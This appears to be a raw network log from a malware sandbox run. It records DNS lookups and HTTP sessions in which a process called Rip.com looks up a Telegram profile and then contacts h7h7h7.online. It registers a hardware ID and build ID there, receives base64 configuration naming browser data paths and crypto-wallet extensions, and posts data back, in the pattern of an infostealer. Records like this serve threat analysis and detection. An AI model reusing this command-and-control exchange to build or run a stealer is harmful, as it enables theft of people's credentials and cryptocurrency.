                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.243830919 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.244673014 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.244693995 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.847028017 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.847057104 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.847110033 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.848256111 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.848268032 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.493694067 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.493743896 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.496753931 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.496762037 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.498707056 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.498714924 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196888924 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196949959 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196966887 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196999073 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.197168112 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.197180986 CET44349788116.203.13.109192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 21:39:50.698323965 CET | 192.168.2.4 | 1.1.1.1 | 0x6ce1 | Standard query (0) | uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:05.101241112 CET | 192.168.2.4 | 1.1.1.1 | 0x14fa | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:06.424777031 CET | 192.168.2.4 | 1.1.1.1 | 0x1a24 | Standard query (0) | h7h7h7.online | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:17.983171940 CET | 192.168.2.4 | 1.1.1.1 | 0x8c33 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:17.983310938 CET | 192.168.2.4 | 1.1.1.1 | 0x3454 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Dec 31, 2024 21:40:21.841187954 CET | 192.168.2.4 | 1.1.1.1 | 0xda44 | Standard query (0) | apis.google.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:21.841319084 CET | 192.168.2.4 | 1.1.1.1 | 0x57c0 | Standard query (0) | apis.google.com | 65 | IN (0x0001) | false
Dec 31, 2024 21:40:22.848300934 CET | 192.168.2.4 | 1.1.1.1 | 0x46e4 | Standard query (0) | play.google.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:22.848611116 CET | 192.168.2.4 | 1.1.1.1 | 0x67da | Standard query (0) | play.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 21:39:50.788264036 CET | 1.1.1.1 | 192.168.2.4 | 0x6ce1 | Name error (3) | uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm | none | none | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:05.108108997 CET | 1.1.1.1 | 192.168.2.4 | 0x14fa | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:06.437154055 CET | 1.1.1.1 | 192.168.2.4 | 0x1a24 | No error (0) | h7h7h7.online | | 116.203.13.109 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:17.989783049 CET | 1.1.1.1 | 192.168.2.4 | 0x8c33 | No error (0) | www.google.com | | 172.217.16.132 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:17.989882946 CET | 1.1.1.1 | 192.168.2.4 | 0x3454 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Dec 31, 2024 21:40:21.847990036 CET | 1.1.1.1 | 192.168.2.4 | 0xda44 | No error (0) | apis.google.com | plus.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 31, 2024 21:40:21.847990036 CET | 1.1.1.1 | 192.168.2.4 | 0xda44 | No error (0) | plus.l.google.com | | 216.58.212.174 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 21:40:21.848292112 CET | 1.1.1.1 | 192.168.2.4 | 0x57c0 | No error (0) | apis.google.com | plus.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 31, 2024 21:40:22.855129004 CET | 1.1.1.1 | 192.168.2.4 | 0x46e4 | No error (0) | play.google.com | | 142.250.186.174 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                              • t.me
                                                                                                                                                                                                                                                              • h7h7h7.online
                                                                                                                                                                                                                                                              • www.google.com
                                                                                                                                                                                                                                                              • apis.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 149.154.167.99 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:06 UTC | 85 | OUT | GET /w211et HTTP/1.1
                                                                                                                                                                                                                                                              Host: t.me
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-31 20:40:06 UTC | 511 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 12308
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: stel_ssid=7773a24815fd7d40e1_8723601272896908433; expires=Wed, 01 Jan 2025 20:40:06 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Cache-control: no-store
                                                                                                                                                                                                                                                              X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=35768000
2024-12-31 20:40:06 UTC | 12308 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:07 UTC | 186 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-31 20:40:07 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:08 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----s2n79hdjwbsjmyu37gvk
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:08 UTC | 256 | OUT | Data Ascii:
------s2n79hdjwbsjmyu37gvk
Content-Disposition: form-data; name="hwid"

CF1BFDD511D63305298366-a33c7340-61ca
------s2n79hdjwbsjmyu37gvk
Content-Disposition: form-data; name="build_id"

f4c9ac30c7e86011d996b9b6076307b5
------s2n79hdjwbsjmyu37gvk--
2024-12-31 20:40:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:09 UTC | 69 | IN | Data Ascii:
3a
1|1|1|1|2501d44103c55efc5f73d4da6882b199|1|0|1|1|0|50000|1
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:09 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----as2djeknyuk6f3e3ekx4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:09 UTC | 331 | OUT | Data Ascii:
------as2djeknyuk6f3e3ekx4
Content-Disposition: form-data; name="token"

2501d44103c55efc5f73d4da6882b199
------as2djeknyuk6f3e3ekx4
Content-Disposition: form-data; name="build_id"

f4c9ac30c7e86011d996b9b6076307b5
------as2djeknyuk6f3e3ekx4
Cont
2024-12-31 20:40:10 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:10 UTC | 2192 | IN | Data Ascii:
884
R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:11 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3oh479zmgln7qimyukfu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:11 UTC | 331 | OUT | Data Ascii:
------3oh479zmgln7qimyukfu
Content-Disposition: form-data; name="token"

2501d44103c55efc5f73d4da6882b199
------3oh479zmgln7qimyukfu
Content-Disposition: form-data; name="build_id"

f4c9ac30c7e86011d996b9b6076307b5
------3oh479zmgln7qimyukfu
Cont
2024-12-31 20:40:11 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:11 UTC | 5837 | IN | Data Ascii:
16c0
TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:12 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----yuaiwtrqqimg4ekxl6fc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:12 UTC | 332 | OUT | Data Ascii:
------yuaiwtrqqimg4ekxl6fc
Content-Disposition: form-data; name="token"

2501d44103c55efc5f73d4da6882b199
------yuaiwtrqqimg4ekxl6fc
Content-Disposition: form-data; name="build_id"

f4c9ac30c7e86011d996b9b6076307b5
------yuaiwtrqqimg4ekxl6fc
Cont
2024-12-31 20:40:13 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:13 UTC | 119 | IN | Data Ascii:
6c
TWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.449743116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:14 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----sr1dbsjmymym7qi5fcjm
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 6913
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-31 20:40:14 UTC | 6913 | OUT | Data Ascii: ------sr1dbsjmymym7qi5fcjmContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------sr1dbsjmymym7qi5fcjmContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------sr1dbsjmymym7qi5fcjmCont
2024-12-31 20:40:14 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:14 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-31 20:40:14 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49744 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:15 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9rieusr1n7qieu37yuas
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 489
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-31 20:40:15 UTC | 489 | OUT | Data Ascii: ------9rieusr1n7qieu37yuasContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------9rieusr1n7qieu37yuasContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------9rieusr1n7qieu37yuasCont
2024-12-31 20:40:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-31 20:40:15 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49750 | 172.217.16.132 | 443 | 6632 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:18 UTC | 607 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-12-31 20:40:18 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:18 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-FEHvBN2HjBfTyg3M00freA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
2024-12-31 20:40:18 UTC | 124 | IN | Data Ascii: 33e)]}'["",["norwegian cruise ship man overboard","vexbolts tiktok live follower count","polar vortex weather forecast","
2024-12-31 20:40:18 UTC | 713 | IN | Data Ascii: ripple xrp","buffalo bills patriots","spacex rocket launch today","samsung galaxy s25 ultra camera leak","peach drop"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u00
2024-12-31 20:40:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49751 | 172.217.16.132 | 443 | 6632 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:19 UTC | 510 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-12-31 20:40:20 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:19 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49752 | 172.217.16.132 | 443 | 6632 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:19 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-12-31 20:40:19 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Tue, 31 Dec 2024 20:40:19 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-31 20:40:19 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-31 20:40:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49760 | 216.58.212.174 | 443 | 6632 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:22 UTC | 733 | OUT | GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
Host: apis.google.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
